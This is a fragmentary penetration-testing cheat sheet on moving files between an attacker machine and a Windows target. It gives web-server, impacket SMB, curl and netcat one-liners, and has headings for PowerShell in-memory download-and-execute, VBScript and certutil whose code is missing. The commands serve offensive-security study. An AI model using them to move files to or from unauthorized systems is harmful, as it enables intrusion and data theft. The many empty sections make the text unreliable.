😌Windows File Transfer

simple webserver


| python 2.7

python2 -m SimpleHTTPServer

| python3

python3 -m http.server

| ruby

ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"

| php

php -S 0.0.0.0:8888

Smbsever (impacket)


impacket-smbserver

copy \\<ip>\<path>\<file> # Linux to windows

copy <file> \\<ip>\<path>\ # Windows to linux

| kali:

| windows:

TFTP

hacker

| target

FTP


| hacker

SCP


VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

You then execute the script like this:

PowerShell


| Download File to path

| Download testfile and executes it in the memory

|powershell full path:

| powershell wget

wget.psl

| kali

| target:

netcat

nc -lvp 1234 > <out_file>

nc <ip> 1234 < <in _file>

curl

curl <url> -o outfile

certutils


| windows

Last updated